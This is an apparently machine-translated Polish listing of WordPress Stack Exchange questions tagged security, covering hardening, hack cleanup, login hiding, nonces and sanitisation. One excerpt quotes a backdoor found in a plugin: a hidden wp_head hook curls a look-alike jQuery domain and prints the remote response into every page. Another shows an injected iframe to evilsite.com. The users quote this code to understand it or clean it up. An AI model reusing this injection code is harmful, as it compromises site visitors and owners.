Pytania otagowane jako security

Wzmocnienie motywów, wtyczek i instalacji rdzenia, aby zapobiec włamaniom.


8
Czy przeniesienie wp-config poza katalog główny jest naprawdę korzystne?
Jedną z najczęstszych najlepszych praktyk bezpieczeństwa w dzisiejszych czasach wydaje się być przenoszenie o wp-config.phpjeden katalog wyżej niż katalog główny vhosta . Nigdy tak naprawdę nie znalazłem dobrego wytłumaczenia tego, ale zakładam, że minimalizuje to ryzyko złośliwego lub zainfekowanego skryptu w katalogu głównym od odczytu hasła do bazy danych. Ale …

12
Weryfikowanie, czy w pełni usunąłem hack WordPress?
Mój fajny blog WordPress na http://fakeplasticrock.com (z WordPress 3.1.1) został zhakowany - wyświetlał się <iframe>na każdej stronie tak: <iframe src="http://evilsite.com/go/1"></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> Zrobiłem następujące Aktualizacja do wersji 3.1.3 poprzez wbudowany system aktualizacji WordPress Zainstalowałem skaner Exploit (wiele krytycznych ostrzeżeń o …
105 security  hacked 

3
Jak chronić przesłane pliki, jeśli użytkownik nie jest zalogowany?
Używam wordpress na prywatnej stronie, na której użytkownicy przesyłają pliki. Używam „Prywatnego WordPressa”, aby uniemożliwić dostęp do strony, jeśli użytkownik nie jest zalogowany. Chciałbym zrobić to samo z plikami przesłanymi w folderze uploads. Jeśli więc użytkownik nie jest zalogowany, nie będzie mógł uzyskać dostępu do: https://xxxxxxx.com/wp-content/uploads/2011/12/xxxxxxx.pdf, jeśli spróbuje uzyskać dostęp, …

11
Czy mogę zmienić nazwę folderu wp-admin?
Czy można zmienić nazwę folderu wp-admin? Wiem, że mógłbym po prostu zmienić jego nazwę, ale jeśli nie jest to obsługiwane przez kod, wiele rzeczy by się zepsuło. Jeśli użyję niestandardowej nazwy folderu, spowoduje to, że będzie ona nieco bezpieczniejsza, bezpieczeństwo przez niejasność i tak dalej.


3
Jakie obawy dotyczące bezpieczeństwa powinienem mieć przy ustawianiu FS_METHOD na „direct” w wp-config?
Ostatnio miałem problem z tym, że nie byłem w stanie zainstalować wtyczki WP Smush Pro, ponieważ nie mam dostępnych opcji instalacji ręcznej ani instalacji jednym kliknięciem. Natknąłem się na ten post, który sugerował dostosowanie ustawień w wp-config.php. Dodałem sugerowane ustawienia, jednak najważniejsze wydaje się: define('FS_METHOD', 'direct'); Co chciałbym wiedzieć, jest …


1
Warto ograniczyć bezpośredni dostęp do plików motywów?
Od czasu do czasu natrafiam na następujący fragment motywu: if ( ! defined('ABSPATH')) exit('restricted access'); Jest na początku niektórych (wszystkich?) Plików PHP w motywie i ma zapobiegać bezpośredniemu dostępowi do pliku przez nikczemne źródła. Widzę, że nie jest to uwzględnione w dwudziestu dziesięciu lub jedenastu i nigdy nie widziałem, aby …

4
Interfejs API REST WordPress 4.7.1 nadal udostępnia użytkowników
Zaktualizowałem WordPress do 4.7.1, a potem próbowałem wyliczyć użytkowników za pomocą REST API, co powinno zostać naprawione, ale udało mi się odzyskać użytkowników. https://mywebsite.com/wp-json/wp/v2/users Wydajność: [{"id":1,"name":"admin","url":"","description":"","link":"https:\/\/mywebsite\/author\/admin\/","slug":"admin","avatar_urls":{"24": ... Dziennik zmian z najnowszej wersji: Interfejs API REST ujawnił dane użytkownika dla wszystkich użytkowników, którzy byli autorami postów typu publicznego. WordPress 4.7.1 ogranicza …

3
Jak najłatwiej powstrzymać WP przed wylogowaniem mnie
Po pewnym czasie WP wylogowuje wszystkich użytkowników i zmusza ich do ponownego zalogowania. W przypadku środowisk programistycznych na moim komputerze lokalnym jest to nieprzyjemne i absolutnie niepotrzebne. Czy istnieje oparty na API sposób wyłączania automatycznego wylogowywania na czas nieokreślony? Idealnie chciałbym coś, co mogę dodać wp-config.phpwraz z innymi ustawieniami związanymi …

4
Czy jest jakiś sposób na zmianę nazwy lub ukrycie wp-login.php?
W jakikolwiek sposób zmienić adres URL wp-login.php? Wydaje się niepewne, że każdy, kto kiedykolwiek korzystał z Wordpress, mógł łatwo sprawdzić, czy witryna go używa, i przejść bezpośrednio do strony logowania. Kiedyś istniała wtyczka o nazwie „Stealth login”, ale nie była aktualizowana. (I stąd nasza niechęć do polegania na wtyczkach).
26 login  security 


13
Jakie są najlepsze praktyki bezpieczeństwa dotyczące wtyczek i motywów WordPress? [Zamknięte]
W obecnej formie to pytanie nie pasuje do naszego formatu pytań i odpowiedzi. Oczekujemy, że odpowiedzi poparte będą faktami, referencjami lub wiedzą specjalistyczną, ale to pytanie prawdopodobnie będzie wymagało debaty, argumentów, ankiet lub rozszerzonej dyskusji. Jeśli uważasz, że to pytanie można poprawić i ewentualnie ponownie otworzyć, odwiedź centrum pomocy w …

2
wp_verify_nonce vs check_admin_referer
Jaką różnicę powinienem zastosować? Wiem, że wp_verify_nonce sprawdza limit czasu, a check_admin_referer myślę, że wywołuje wp_verify_nonce, a także sprawdza segment adresu URL administratora, ale jestem nieco zdezorientowany, który powinienem użyć i kiedy. Dzięki za jasność.
21 admin  security  nonce 

3
Wzrost nieudanych prób logowania, ataki siłowe? [Zamknięte]
Zamknięte. To pytanie jest nie na temat . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizuj pytanie, aby było tematyczne na WordPress Development Stack Exchange. Zamknięte 4 lata temu . Zainstalowałem wtyczkę Simple Login Lockdown i od kilku dni baza danych rejestruje ponad 200 rekordów dziennie. Myślę, że nie …
20 login  security 

6
Czy wtyczki Wordpress są niezbędne?
Jestem nowy w WordPress. Niedawno przeczytałem artykuł o tym, jak hakerzy mogą wykorzystać luki we wtyczkach. Różne źródła, takie jak Google Pagespeed, również odradzają mi korzystanie z wtyczek lub przynajmniej ograniczają je do minimum. Osobiście staram się również unikać wtyczek, ponieważ mam większą kontrolę nad tym, co dzieje się na …
19 plugins  security 



2
Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne?
Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

2
W jakich kontekstach wtyczki są odpowiedzialne za sprawdzanie poprawności / dezynfekcję danych?
Chcę się upewnić, że wszystkie dane w moich wtyczkach / motywach są bezpiecznie obsługiwane przed wejściem do bazy danych i przed wysłaniem do przeglądarki. Mój problem polega na tym, że istnieją sytuacje, w których interfejs API zajmuje się czyszczeniem dla Ciebie - na przykład podczas zapisywania pól meta - i …


3
Jakie są typowe wady bezpieczeństwa, których muszę szukać? [Zamknięte]
W obecnej formie to pytanie nie pasuje do naszego formatu pytań i odpowiedzi. Oczekujemy, że odpowiedzi poparte będą faktami, referencjami lub wiedzą fachową, ale to pytanie prawdopodobnie będzie wymagało debaty, argumentów, ankiet lub rozszerzonej dyskusji. Jeśli uważasz, że to pytanie można poprawić i ewentualnie ponownie otworzyć, odwiedź centrum pomocy w …



4
Jak działa admin-ajax.php?
Mamy problemy z zewnętrznym programistą. Chcemy ograniczyć dostęp do wp-adminstrony tylko do dostępu wewnętrznego (przez VPN ). Po prostu nie będzie atakowany przez zewnętrznych użytkowników. Możemy wyliczyć administratorów z witryny i nie chcemy, aby zostali wyłudzeni. Nasz programista twierdzi, że nie możemy tego zrobić, ponieważ strona musi mieć zewnętrzną stronę …
14 admin  ajax  security 

3
Zapobiegaj dostępowi lub automatycznemu usuwaniu pliku readme.html, license.txt, wp-config-sample.php
Krótkie pytanie, które może trochę pomóc w bezpieczeństwie. Zauważyłem, że plik readme.html ma wymieniony numer wersji. Ponownie pojawia się po każdej aktualizacji, podobnie jak licence.txt i wp-config-sample.php. Czy istnieje prosty sposób, aby WordPress automatycznie usuwał te pliki po aktualizacji? Już blokuję wyświetlanie numeru wersji w metatagach, kanałach RSS, atomie itp. …


1
Jak bezpieczny / odkażony jest wp_insert_posts ()?
Patrząc na kodeks dla wp_insert_post () , stwierdza on, że ta funkcja „... dezynfekuje zmienne, wykonuje pewne kontrole, uzupełnia brakujące zmienne, takie jak data / czas itp.” (EDYCJA: Zaktualizowałem wpis Kodeksu, aby zawierał bardziej solidny przykład w tym bezpieczeństwo, a także meta post i przypisanie kategorii) Zastanawiam się tylko, czy …

4
Dlaczego powinienem używać esc_url?
To utrudnia moje kodowanie. Kodeks Wordpress uzasadnia użycie esc_url mówiąc niejasno o bezpieczeństwie. Ale czy to naprawdę jest warte kłopotów? Na przykład, jaka jest ważna, praktyczna korzyść z bezpieczeństwa przy użyciu <?php echo esc_url( home_url( '/' ) ); ?> zamiast <?php echo home_url() ?> PS: Nie mówię o tworzeniu motywów, …
12 security 

Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.